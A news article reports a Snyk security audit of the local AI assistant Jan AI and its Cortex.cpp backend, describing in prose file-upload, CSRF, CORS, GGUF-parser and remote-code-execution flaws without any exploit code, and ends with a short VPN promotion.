Critical Security Flaws Discovered in Jan AI, Exposing Systems to Remote Attacks

Bisma Farrukh

Multiple security vulnerabilities in Jan AI, an open-source alternative to ChatGPT, have been discovered, which could potentially be exploited by remote, unauthenticated attackers to manipulate systems. This warning comes from Snyk, a developer security platform.
Jan AI, developed by Menlo Research, is marketed as a personal assistant that operates offline on desktops and mobile devices. It provides a library of popular large language models (LLMs) and supports extensions for customization. This tool, which has over one million downloads on GitHub, enables users to download and run LLMs locally on their devices, offering full control over the AI without relying on cloud-based hosting services.
Jan AI’s functionality is powered by Menlo’s self-hosted AI engine, Cortex.cpp, which serves as the backend API server and is paired with an Electron application for the user interface. Through Cortex, users can access models from a dedicated hub, including HuggingFace, and import local models stored in the GGUF file format.
Since Jan AI and Cortex are designed to run locally on users’ systems, they lack essential authentication mechanisms, making them vulnerable to attacks from malicious web pages. A security audit conducted by Snyk revealed several critical vulnerabilities.
One major issue was identified in a function for uploading files to the server, which lacked proper sanitization. This flaw could allow an attacker from a malicious web page to upload arbitrary files to the system. In addition, the analysis uncovered out-of-bounds issues in Jan’s GGUF parser and the absence of cross-site request forgery (CSRF) protections on the server, particularly on non-GET endpoints. Despite Cortex implementing cross-origin resource sharing (CORS), these vulnerabilities still present significant risks.
Furthermore, an attacker could leverage a cross-origin request to alter the server’s configuration, disabling CORS entirely. Once this is done, the attacker could retrieve the leaked data by requesting the model’s metadata endpoint.
Although the ability to leak data via a crafted GGUF file is notable, Snyk pointed out its limitations. Specifically, the attacker has no control over what gets mapped after the malicious file is processed, making it uncertain whether sensitive data could be exposed in this manner.
Another significant vulnerability discovered was the risk of remote code execution (RCE) via Cortex.cpp’s support for python-engine. Since the python-engine acts as a C++ wrapper for executing the Python binary, an attacker could manipulate the model configuration to inject a malicious payload. This payload would trigger command execution when the model is started, potentially allowing the attacker to run arbitrary code on the target system.
Note:
Using a VPN with ChatGPT enhances privacy by masking your IP address, encrypting your communication, and preventing unauthorized entities (such as hackers, ISPs, or advertisers) from tracking your activity. It also ensures your data is secure, reduces the likelihood of personal identification, and helps you bypass restrictions or censorship. If privacy is a concern for you, using a VPN is a smart way to protect your interactions while using services like ChatGPT.
No comments were posted yet